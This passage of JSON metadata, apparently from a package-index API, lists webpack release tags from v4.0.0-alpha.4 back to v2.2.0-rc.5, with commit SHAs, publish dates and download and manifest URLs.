ack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/host